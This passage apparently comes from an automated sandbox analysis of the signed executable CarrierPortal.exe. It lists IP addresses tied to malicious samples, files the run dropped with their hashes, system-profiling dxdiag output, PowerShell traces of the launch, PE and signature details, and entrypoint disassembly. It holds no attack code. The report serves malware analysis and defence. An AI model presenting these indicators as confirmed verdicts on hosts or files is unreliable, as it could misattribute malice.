                                                                  • 157.245.169.73
                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.245.145.71
                                                                  1.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.230.180.175
                                                                  http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                  • 159.89.102.253

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                  Download File
                                                                  Process:C:\Windows\System32\Taskmgr.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):4
                                                                  Entropy (8bit):1.5
                                                                  Encrypted:false
                                                                  SSDEEP:3:R:R
                                                                  MD5:F49655F856ACB8884CC0ACE29216F511
                                                                  SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                  SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                  SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                  Malicious:false
                                                                  Preview:EERF

                                                                  C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                  Download File
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):65552
                                                                  Entropy (8bit):0.012588069182000032
                                                                  Encrypted:false
                                                                  SSDEEP:3:63qIllGlll/l/lXp9ZjrPBY06llcllXgvZP:63qIl0dPBY0O6/O
                                                                  MD5:7A0F107CC175B4CA3EDB21F3953CB3E9
                                                                  SHA1:7B64025EA33E429362475759AEB787CE8D3E101C
                                                                  SHA-256:27F484DE82D7E1A41A5DC67D0AE827C8407C07FFDF1DEF1D61BB114E825F74E0
                                                                  SHA-512:732FBF07C8C32F122E3DB2DEC40B727F9C1669F5103A741E56699C042530628755BDDC62E8F84B6321E2818F2080C17CF5FB0AE59C7701670491284C252C4BCB
                                                                  Malicious:false
                                                                  Preview:.j..........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                  Download File
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):1.5
                                                                  Encrypted:false
                                                                  SSDEEP:3:R:R
                                                                  MD5:F49655F856ACB8884CC0ACE29216F511
                                                                  SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                  SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                  SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                  Malicious:false
                                                                  Preview:EERF

                                                                  C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                  Download File
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.020482262885854904
                                                                  Encrypted:false
                                                                  SSDEEP:3:9llpl5d2DJqojBdl+Sli5lWyyHk15lRlTNlktt/llaia9sVQMm6En:c9q0Bn+SkSJkJNetb2Hrn
                                                                  MD5:27C5B2CF8CC33DE010AE37B1B8B0E715
                                                                  SHA1:F4B312BFCF51C533CA43AC8A5302450A906159AA
                                                                  SHA-256:2EB0A2FD1624CFD6E21CF4121E8C44071EEAAA94FC1B0B9A39B23B571D58D40F
                                                                  SHA-512:0ECF3D1E0FE3C336C5A12A01D0F960E605A3B1422ED1FE38C16BC959027890E91BC91C0DA70115ADDCFD4681112E8E20C6EAB68C2BF41F731CF97B05656B24DA
                                                                  Malicious:false
                                                                  Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Zm.F............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):61426
                                                                  Entropy (8bit):5.07948872134001
                                                                  Encrypted:false
                                                                  SSDEEP:1536:eA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdx7YWfSb7OdBYNPzqtAHki:t1+z30n1bV3CNBQkj2UqiUqaVLflJnP8
                                                                  MD5:6AAF3527C80775C9128AE5B7BC0ECB4F
                                                                  SHA1:7EEF74B516BD09A29E6AECA628B76863768EEDED
                                                                  SHA-256:80812FF347086EDF15401EA1B2AC96881633B4F0FC1D2C7D3B443821770562E3
                                                                  SHA-512:58D78A85601CB830F87A6B0496BD001FA469F4B66AFAC99543C1E2021E82A819DAEE482F8F296512788B857508008708DF49427123DB775D684AE1C2F1A0A1BB
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE.]...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3asbs44p.jln.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2qt413p.rel.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pw12wceg.4e4.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn1gy51v.hex.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):85405
                                                                  Entropy (8bit):5.206265703712478
                                                                  Encrypted:false
                                                                  SSDEEP:768:EP9JWMB5MBB+Q6Uc8FgGVoXX7lV6EMR57X3i0hG6gHCXkNEr+aL/FkJOlKwY0:E7cKOV2uRoxHtOu0
                                                                  MD5:5C63A7CF2A1A91BAE5BA2A87C3E7F397
                                                                  SHA1:8769B621B7601F912D160C3971E8EB99B74780CF
                                                                  SHA-256:BA2BA43ECB96261AD2376FBBAB59F074CDA7A42AF9034F0AEA704FFE1CB27BAE
                                                                  SHA-512:6F26A3CFB8A4AD86FD9F6BB1FCB08F3E7D3D68A6CD814C12FFBA3AA01557580105141249F5263AD8008E0CD7F60EFCD0E3CE21431F2262FDBF25576025B44561
                                                                  Malicious:false
                                                                  Preview:------------------..System Information..------------------.. Time of this report: 1/4/2025, 17:07:28.. Machine name: 320946.. Machine Id: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: 2fmZyLfoncO4l1P.. System Model: B 1VhpWu.. BIOS: VMW201.00V.21805430.B64.2305221830 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 1477MB used, 6713MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Suserng: Disable

                                                                  C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):85405
                                                                  Entropy (8bit):5.206261750975624
                                                                  Encrypted:false
                                                                  SSDEEP:768:gP9JWMB5MBB+Q6Uc8FgGVoXX7lV6EMR57X3i0hG6gHCXkNEr+aL/FkJOlKwY0:g7cKOV2uRoxHtOu0
                                                                  MD5:FA248E8EA9D695CF75BD1A1EFE0ECE80
                                                                  SHA1:B092C86DACD3E95D938BC117AD722C1CCD639A8A
                                                                  SHA-256:0A3996B342B5D18ED2B88B3814EC0D7CCC013917E075E48DD5303869B33AF7E0
                                                                  SHA-512:A29B7338077FFED9074AF0A2B0DA1AC9207DCC68D5414B8AACA6E18CCC36D363F3C85D3F30C3E43ECF980A53B7F9F2886668982ABE6DA68CFCA662551D8E4B07
                                                                  Malicious:false
                                                                  Preview:------------------..System Information..------------------.. Time of this report: 1/4/2025, 17:08:21.. Machine name: 320946.. Machine Id: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: 2fmZyLfoncO4l1P.. System Model: B 1VhpWu.. BIOS: VMW201.00V.21805430.B64.2305221830 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 1867MB used, 6323MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Suserng: Disable

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):45
                                                                  Entropy (8bit):0.9111711733157262
                                                                  Encrypted:false
                                                                  SSDEEP:3:/lwlt7n:WNn
                                                                  MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                  SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                  SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                  SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                  Malicious:false
                                                                  Preview:........................................J2SE.

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):37
                                                                  Entropy (8bit):4.195675662809303
                                                                  Encrypted:false
                                                                  SSDEEP:3:wov1xCQov:wov1xiv
                                                                  MD5:A0532016B03CEF83542FEE635609EF88
                                                                  SHA1:BE067DD6F4B13D403B0D5A9593353C2EAFD66C67
                                                                  SHA-256:2B5D9E3D3D06B74A6ACA12C41ECA9CDE450B6FF5042DD67B64DB4C6E20C78BC9
                                                                  SHA-512:686BE0692BAB02E6292EAA6EB8CCCBA6284997764CDA3A2C1278134B7DB7C0F1F838DF5CCB08728C85CE7D6F689BA3D36ACF14BF70DA9AD759E7D0FAC6C4F072
                                                                  Malicious:false
                                                                  Preview:cd .\Desktop\...\CarrierPortal.exe ..

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5440
                                                                  Entropy (8bit):3.944331033257326
                                                                  Encrypted:false
                                                                  SSDEEP:96:l87RNO1GClFbakvMWJgmQbFHPJgmQbHe4:CVNArJgpJgG4
                                                                  MD5:41475B6E876C28154CFA553BD7DA484B
                                                                  SHA1:6D3D285486FFFD745A3C48E79A84EA447F3AD732
                                                                  SHA-256:6322AFEBE39DE209EFA6EE5953F60203E54993B687CAC8A23D652EB3B29B90B8
                                                                  SHA-512:ED7D41D3514BBD7E661C1B2411F8B1067AEC7628D07D036493589A012F64FE6FA01DA9E4E2220127934942B474F7AEB5A2E65FFA7E63CCB9569FFBD4E1D8FF8B
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F. .. ......{4...]....^..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4....b...^.......^......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H$Z...............................A.p.p.D.a.t.a...B.V.1.....$Z...Roaming.@......FW.H$Z...........................}!..R.o.a.m.i.n.g.....\.1.....$Z...MICROS~1..D......FW.H$Z.............................O.M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.H$Z............................[..W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H$Z.....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.J..Programs..j......FW.H$Z.....................@......!r.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H$Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H$Z......Q...........

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7TDB8RV61ZBWE7ZKWIAR.temp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5440
                                                                  Entropy (8bit):3.944331033257326
                                                                  Encrypted:false
                                                                  SSDEEP:96:l87RNO1GClFbakvMWJgmQbFHPJgmQbHe4:CVNArJgpJgG4
                                                                  MD5:41475B6E876C28154CFA553BD7DA484B
                                                                  SHA1:6D3D285486FFFD745A3C48E79A84EA447F3AD732
                                                                  SHA-256:6322AFEBE39DE209EFA6EE5953F60203E54993B687CAC8A23D652EB3B29B90B8
                                                                  SHA-512:ED7D41D3514BBD7E661C1B2411F8B1067AEC7628D07D036493589A012F64FE6FA01DA9E4E2220127934942B474F7AEB5A2E65FFA7E63CCB9569FFBD4E1D8FF8B
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F. .. ......{4...]....^..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4....b...^.......^......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H$Z...............................A.p.p.D.a.t.a...B.V.1.....$Z...Roaming.@......FW.H$Z...........................}!..R.o.a.m.i.n.g.....\.1.....$Z...MICROS~1..D......FW.H$Z.............................O.M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.H$Z............................[..W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H$Z.....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.J..Programs..j......FW.H$Z.....................@......!r.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H$Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H$Z......Q...........

                                                                  C:\Users\user\Documents\20250104\PowerShell_transcript.320946.KTTZ1Aq5.20250104170758.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):842
                                                                  Entropy (8bit):5.088435793825327
                                                                  Encrypted:false
                                                                  SSDEEP:24:BxSAwrvvwdOx2DOaUWeWnKjekKKaX4CIym1ZJXZfM:BZovCOoOQnyqYB1Zo
                                                                  MD5:FC78BA90FDA82BEE09D449EEDAB4DECE
                                                                  SHA1:24570D0F570C8DC1EF610B40F025AF4596E6D79E
                                                                  SHA-256:90FD172F4A139F1E4D46D01648479F02B5D6B294DEFDCF54AE4B504B808725B1
                                                                  SHA-512:D94225C9E7C65130C4E73DF9522CF934A3EF3D9779BADD2FE56A261A36553DFAD5D5E218A69ACF911BA48B3467F1AA5D1381376D0055CE52905323772A2FE7D7
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20250104170759..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe..Process ID: 3024..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20250104171336..**********************..PS C:\Users\user> cd .\Desktop\..**********************..Command start time: 20250104171346..**********************..PS C:\Users\user\Desktop> .\CarrierPortal.exe ..

                                                                  \Device\ConDrv

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (824), with no line terminators, with escape sequences
                                                                  Category:dropped
                                                                  Size (bytes):824
                                                                  Entropy (8bit):3.9418953353089767
                                                                  Encrypted:false
                                                                  SSDEEP:24:5O2OZO52OrOAO9OwdnV0GoMjbMjwgjkgjRLgj9gj3gj/Ugj8gjWgj5gjXgjbMjaz:ct85tyjgOskgwgVg5gjgzUgwgyglgbgN
                                                                  MD5:A39DEC971253BD18D2B28CB2B3EDD70F
                                                                  SHA1:3F9CB8DE24C84A38FEC2CE8F9DEDF354003043FF
                                                                  SHA-256:E05E916FEBEAF8873086E58BA86FB79F0551671316B3F6505A43C1669E04CE8A
                                                                  SHA-512:F084893A82FF22E3F817CA29A9EA50785A6CC98FEEE5634D0FDADC9DC94A915B494796F5271E04E5BFD68E4DBE2804BE59F2A7E05A5001A362A9F6768D678A27
                                                                  Malicious:false
                                                                  Preview:.[93mc.[33m.[45m.[0m.[93mcd.[33m.[45m.[0m.[93mcd.[33m.[45m .[33m.[45m.[0m.[93mcd.[33m.[45m .[33mD.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDe.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDes.[33m.[45m.[0m.[93mcd.[33m.[45m .[33mDesk.[33m.[45m.[0m.[93mcd.[33m.[45m .[33m.\Desktop\.[33m.[45m.[0m.[93mC.[33m.[45m.[0m.[93mCa.[33m.[45m.[0m.[93mCar.[33m.[45m.[0m.[93mCarr.[33m.[45m.[0m.[93m.\CarrierPortal.exe.[33m.[45m.[0m.[93m.\CarrierPortal.ex.[33m.[45m .[0m.[93m.\CarrierPortal.e.[33m.[45m .[0m.[93m.\CarrierPortal..[33m.[45m .[0m.[93m.\CarrierPortal.[33m.[45m .[0m.[93m.\CarrierPorta.[33m.[45m .[0m.[93m.\CarrierPort.[33m.[45m .[0m.[93m.\CarrierPor.[33m.[45m .[0m.[93m.\CarrierPo.[33m.[45m .[0m.[93m.\CarrierP.[33m.[45m .[0m.[93m.\Carrier.[33m.[45m .[0m.[93m.\CarrierPortal.exe.[33m.[45m.[0m.[93m.\CarrierPortal.exe.[33m.[45m .[33m.[45m.[0m

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.405360296456165
                                                                  TrID:
                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:CarrierPortal.exe
                                                                  File size:21'461'272 bytes
                                                                  MD5:4c6d58378be4b9051debfb5670f5b82c
                                                                  SHA1:851cc9c8753aa28ad94123e642b34d778d8fe30e
                                                                  SHA256:19b883fd205513f2c8d7933a35ff86c63194312a75a6ff9a83a1c649b55603da
                                                                  SHA512:5544107324d54c21e0a3c981753b1be3ff845b29c3ef813a3278bfa0b5b64bc1f54e3e54bda8f32334b407123ba7bc7c4ea637b4b27baa3198aacb5010690a92
                                                                  SSDEEP:196608:LQ7Ep9oIyFUHd36t0ICh9NgWRypXQdKP3RvuEGxINPzD:LuEpI+Hd3o0ICDElHPwEKU/
                                                                  TLSH:9D277D23E6CD09D0C4ABA0BD9851C2B27B73F44187302BD79A5D661B9C7B6F04A3D366
                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......?.[.{.5.{.5.{.5.r...i.5.j<4...5.j<6...5.j<1.q.5.j<..z.5.b.0.z.5.b.1.C.5.0.1.z.5.0.4.b.5.{.4...5.j<0.e.5.{.5.z.5..<5.z.5..<7.z.5

                                                                  File Icon

                                                                  Icon Hash:72eaa2aaa2a2a292

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x14085aa9c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x140000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67702F45 [Sat Dec 28 17:03:01 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:bd223072972bb1a268da4d5ee34bbdee

                                                                  Authenticode Signature

                                                                  Signature Valid:true
                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                  Signature Validation Error:The operation completed successfully
                                                                  Error Number:0
                                                                  Not Before, Not After
                                                                  • 23/12/2024 01:39:22 24/12/2025 01:39:22
                                                                  Subject Chain
                                                                  • CN="Shanghai Linyao Network Technology Co., Ltd.", O="Shanghai Linyao Network Technology Co., Ltd.", L=Shanghai, S=Shanghai, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Shanghai, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=91310120MA1HY6532E, OID.2.5.4.15=Private Organization
                                                                  Version:3
                                                                  Thumbprint MD5:696903EA9860DCB5291CD07F6881DEF3
                                                                  Thumbprint SHA-1:8E58D9B00A6A43FC5057D22856E7564F77014B3E
                                                                  Thumbprint SHA-256:5085437F5032374D5CC5D60219FB86AA9ABBFCD74682283A5D50AD5470F62023
                                                                  Serial:6F30117FEED4D9B367D9A42D

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  call 00007FBF68E292B8h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  jmp 00007FBF68E28A97h
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  dec ebp
                                                                  mov eax, dword ptr [ecx+38h]
                                                                  dec eax
                                                                  mov ecx, edx
                                                                  dec ecx
                                                                  mov edx, ecx
                                                                  call 00007FBF68E28C32h
                                                                  mov eax, 00000001h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  inc eax
                                                                  push ebx
                                                                  inc ebp
                                                                  mov ebx, dword ptr [eax]
                                                                  dec eax
                                                                  mov ebx, edx
                                                                  inc ecx
                                                                  and ebx, FFFFFFF8h
                                                                  dec esp
                                                                  mov ecx, ecx
                                                                  inc ecx
                                                                  test byte ptr [eax], 00000004h
                                                                  dec esp
                                                                  mov edx, ecx
                                                                  je 00007FBF68E28C35h
                                                                  inc ecx
                                                                  mov eax, dword ptr [eax+08h]
                                                                  dec ebp
                                                                  arpl word ptr [eax+04h], dx
                                                                  neg eax
                                                                  dec esp
                                                                  add edx, ecx
                                                                  dec eax
                                                                  arpl ax, cx
                                                                  dec esp
                                                                  and edx, ecx
                                                                  dec ecx
                                                                  arpl bx, ax
                                                                  dec edx
                                                                  mov edx, dword ptr [eax+edx]
                                                                  dec eax
                                                                  mov eax, dword ptr [ebx+10h]
